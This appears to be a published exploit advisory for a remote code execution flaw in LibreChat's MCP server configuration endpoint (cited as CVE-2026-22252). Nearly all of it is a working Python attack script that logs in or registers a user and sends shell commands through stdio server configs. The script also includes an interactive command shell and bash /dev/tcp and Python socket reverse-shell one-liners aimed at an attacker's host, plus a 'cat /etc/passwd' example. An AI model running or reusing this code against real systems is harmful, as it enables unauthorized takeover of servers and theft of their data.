=============================================================================================================================================
| # Title LibreChat MCP 0.8.2-rc2 Remote Code Execution
=============================================================================================================================================
| # Title : LibreChat MCP 0.8.2-rc2 Remote Code Execution via Unsanitized stdio Server Configuration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.librechat.ai/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252
[+] Summary : A critical Remote Code Execution (RCE) vulnerability was identified in LibreChat?s Model Context Protocol (MCP) server management functionality.
The issue stems from insufficient validation and restriction of user-supplied MCP server configurations, specifically when using the stdio transport type.
An authenticated attacker can abuse the /api/mcp/servers endpoint to define a malicious MCP server configuration that executes
arbitrary system commands on the host running LibreChat. Because the application directly spawns operating system processes based on user-controlled parameters without
proper sandboxing or allowlisting, this flaw enables full command execution with the privileges of the LibreChat service.
Successful exploitation may lead to complete system compromise, including unauthorized access, data exfiltration, persistence,
and lateral movement within the hosting environment. The vulnerability represents a design-level security flaw rather than a simple input validation issue and poses a severe risk in production deployments
[+] POC :
#!/usr/bin/env python3
import requests
import json
import sys
import re
import time
import argparse
import signal
import logging
from typing import Optional, Dict, Any, Tuple, List
from dataclasses import dataclass
from enum import Enum
from urllib.parse import urljoin
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
class TransportType(Enum):
STDIO = "stdio"
SSE = "sse"
HTTP = "http"
@dataclass
class AuthResult:
success: bool
token: Optional[str] = None
cookies: Optional[Dict] = None
session_id: Optional[str] = None
csrf_token: Optional[str] = None
message: str = ""
class LibreChatExploit:
def __init__(self, target_url: str, timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.timeout = timeout
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
})
self.auth_result = AuthResult(success=False)
self.csrf_token = None
def _extract_csrf_token(self, response_text: str) -> Optional[str]:
patterns = [
r'name="csrfToken" value="([^"]+)"',
r'"csrfToken":"([^"]+)"',
r'window\.csrfToken = "([^"]+)"',
r'<meta name="csrf-token" content="([^"]+)"',
]
for pattern in patterns:
match = re.search(pattern, response_text)
if match:
return match.group(1)
if 'csrf_token' in self.session.cookies:
return self.session.cookies.get('csrf_token')
return None
def _get_base_endpoints(self) -> Dict[str, str]:
try:
health_check = self.session.get(
f"{self.target_url}/health",
timeout=self.timeout
)
for endpoint in ['/api', '/api/v1', '/api/v2']:
try:
response = self.session.get(
f"{self.target_url}{endpoint}",
timeout=self.timeout,
allow_redirects=False
)
if response.status_code < 400:
logger.info(f"Found API interface at: {endpoint}")
break
except:
continue
except Exception as e:
logger.debug(f"System check failed: {e}")
return {
'register': '/api/auth/register',
'login': '/api/auth/login',
'mcp_servers': '/api/mcp/servers',
'user_info': '/api/auth/me',
}
def check_target(self) -> Tuple[bool, str, Optional[str]]:
try:
response = self.session.get(
self.target_url,
timeout=self.timeout
)
if response.status_code != 200:
return False, "Server unavailable", None
html_content = response.text
indicators = ['LibreChat', 'librechat', 'Evo', 'Next.js', 'authToken']
is_librechat = any(indicator in html_content for indicator in indicators)
if not is_librechat:
return False, "This may not be a LibreChat server", None
version_patterns = [
r'"version":"([^"]+)"',
r'librechat-([\d\.]+)',
r'v(\d+\.\d+\.\d+)',
]
version = None
for pattern in version_patterns:
match = re.search(pattern, html_content)
if match:
version = match.group(1)
break
self.csrf_token = self._extract_csrf_token(html_content)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
return True, "LibreChat confirmed", version
except requests.RequestException as e:
return False, f"Connection error: {e}", None
def register_user(self, username: str, password: str, email: str) -> bool:
endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['register'])
headers = {"Content-Type": "application/json"}
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token
payload = {
"name": username[:50],
"email": email[:100],
"password": password,
"confirm_password": password,
"username": username[:30]
}
try:
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout
)
logger.debug(f"Registration response: {response.status_code}")
if response.status_code in [200, 201, 302]:
logger.info(f"[?] User registered: {username}")
if 'csrf' in response.text.lower():
self.csrf_token = self._extract_csrf_token(response.text)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
return True
else:
logger.warning(f"Registration failed (HTTP {response.status_code}): {response.text[:200]}")
return False
except Exception as e:
logger.error(f"Error during registration: {e}")
return False
def login(self, email: str, password: str) -> AuthResult:
endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['login'])
headers = {"Content-Type": "application/json"}
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token
payload = {"email": email, "password": password}
try:
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout, allow_redirects=True
)
logger.debug(f"Login response: {response.status_code}")
if response.status_code in [200, 201, 302]:
token = None
try:
data = response.json()
token = data.get('token') or data.get('accessToken') or data.get('authToken')
except:
pass
cookies = dict(self.session.cookies) if self.session.cookies else {}
new_csrf = self._extract_csrf_token(response.text)
if new_csrf:
self.csrf_token = new_csrf
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
auth_valid = self._verify_authentication()
self.auth_result = AuthResult(
success=auth_valid,
token=token,
cookies=cookies,
csrf_token=self.csrf_token,
message="Login successful" if auth_valid else "Authentication invalid"
)
if auth_valid:
logger.info("[?] Login and authentication successful")
else:
logger.warning("[!] Login succeeded but session is invalid")
return self.auth_result
else:
error_msg = f"Login failed: {response.status_code}"
if response.text:
error_msg += f" - {response.text[:100]}"
logger.error(error_msg)
return AuthResult(success=False, message=error_msg)
except Exception as e:
error_msg = f"Login error: {e}"
logger.error(error_msg)
return AuthResult(success=False, message=error_msg)
def _verify_authentication(self) -> bool:
endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['user_info'])
try:
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 200:
user_data = response.json()
return bool(user_data.get('username') or user_data.get('email'))
except:
pass
return False
def check_mcp_endpoint(self) -> Tuple[bool, str]:
endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['mcp_servers'])
try:
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 401:
return False, "Authentication required"
elif response.status_code == 403:
return False, "Forbidden - Might require Admin privileges"
elif response.status_code == 404:
return False, "Not Found - Version mismatch"
elif response.status_code == 200:
return True, "Available"
else:
return False, f"Unknown status: {response.status_code}"
except Exception as e:
return False, f"Connection error: {e}"
def execute_command(self, command: str, shell_path: str = None) -> Tuple[bool, str]:
if not self.auth_result.success:
return False, "Unauthorized"
endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['mcp_servers'])
shell_path = shell_path or '/bin/sh'
safe_command = f"({command}) 2>&1"
payload = {
"config": {
"type": "stdio",
"title": f"server_{int(time.time())}",
"command": shell_path,
"args": ["-c", safe_command]
}
}
headers = {"Content-Type": "application/json"}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token
try:
logger.info(f"Sending command to: {url}")
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout
)
if response.status_code in [200, 201]:
try:
data = response.json()
error = data.get('error') or data.get('message', '')
if error and 'fail' in error.lower():
return False, f"Server rejected: {error}"
except:
pass
return True, "Command sent"
else:
return False, f"Execution failed: {response.status_code} - {response.text[:200]}"
except requests.Timeout:
return False, "Timeout - Command might be running"
except Exception as e:
return False, f"Error: {e}"
def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:
test_file = f"/tmp/librechat_test_{int(time.time())}.txt"
test_command = f"id && whoami && hostname && echo 'test' && date > {test_file} 2>&1"
success, message = self.execute_command(test_command)
if success:
return True, "Vulnerability likely exists (Command sent)", None
else:
return False, f"Vulnerability not found: {message}", None
class InteractiveShell:
def __init__(self, exploit: LibreChatExploit):
self.exploit = exploit
self.running = True
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
def signal_handler(self, signum, frame):
logger.info("\n[!] Shutdown signal received...")
self.running = False
def run(self):
print("\n" + "="*60)
print("Interactive Mode - Type 'help' for menu")
print("Type 'exit' to quit")
print("="*60)
command_history = []
rate_limit = 1
last_command_time = 0
while self.running:
try:
current_time = time.time()
if current_time - last_command_time < rate_limit:
time.sleep(rate_limit - (current_time - last_command_time))
try:
cmd = input("\nexploit> ").strip()
except EOFError:
break
except KeyboardInterrupt:
continue
if not cmd: continue
last_command_time = time.time()
command_history.append(cmd)
if cmd.lower() == 'exit': break
elif cmd.lower() == 'help': self.show_help()
elif cmd.lower() == 'history':
for i, h in enumerate(command_history[-10:], 1): print(f"{i}: {h}")
elif cmd.lower() == 'status':
print(f"Auth: {'Success' if self.exploit.auth_result.success else 'Failed'}")
print(f"CSRF: {'Present' if self.exploit.csrf_token else 'Missing'}")
elif cmd.lower().startswith('shell'):
self.handle_reverse_shell(cmd)
else:
success, message = self.exploit.execute_command(cmd)
print(f"[{'?' if success else '?'}] {message}")
except Exception as e:
logger.error(f"Shell error: {e}")
time.sleep(1)
def show_help(self):
print("""
Commands:
exit - Exit
help - Show this menu
history - Show last 10 commands
status - Auth status
shell [LHOST] [LPORT] - Spawn reverse shell
Examples: id, pwd, ls -la, cat /etc/passwd
""")
def handle_reverse_shell(self, cmd: str):
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: shell [LHOST] [LPORT]")
return
lhost, lport = parts[1], parts[2]
print(f"[*] Preparing reverse shell to {lhost}:{lport}")
shells = [
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
]
for i, s_cmd in enumerate(shells, 1):
print(f"[*] Attempting shell #{i}...")
success, message = self.exploit.execute_command(s_cmd)
if success:
print("[?] Shell sent. Check your listener.")
break
def main():
parser = argparse.ArgumentParser(description='LibreChat MCP RCE Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-c', '--command', help='Command to execute')
parser.add_argument('--test', action='store_true', help='Test vulnerability')
parser.add_argument('--interactive', action='store_true', help='Interactive mode')
parser.add_argument('--username', default='test_user')
parser.add_argument('--password', default='Test12345!')
parser.add_argument('--email', default='
parser.add_argument('--timeout', type=int, default=30)
parser.add_argument('--verbose', '-v', action='store_true')
args = parser.parse_args()
if args.verbose: logging.getLogger().setLevel(logging.DEBUG)
print("="*60)
print("LibreChat MCP RCE Exploit - Enhanced")
print("CVE-2026-22252")
print("="*60)
exploit = LibreChatExploit(args.url, args.timeout)
print("[*] Checking target system...")
ok, msg, ver = exploit.check_target()
if not ok:
print(f"[?] {msg}")
sys.exit(1)
print(f"[?] {msg} (Version: {ver or 'Unknown'})")
print(f"\n[*] Authenticating as {args.username}...")
auth = exploit.login(args.email, args.password)
if not auth.success:
print("[*] Attempting registration...")
if exploit.register_user(args.username, args.password, args.email):
auth = exploit.login(args.email, args.password)
if not auth.success:
print(f"[?] Authentication failed: {auth.message}")
sys.exit(1)
print("[?] Authentication successful")
if args.test:
vuln, msg, out = exploit.test_vulnerability()
print(f"\n[{'?' if vuln else '?'}] {msg}")
elif args.command:
success, msg = exploit.execute_command(args.command)
print(f"[{'?' if success else '?'}] {msg}")
elif args.interactive:
shell = InteractiveShell(exploit)
shell.run()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[*] Interrupted by user")
sys.exit(0)
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================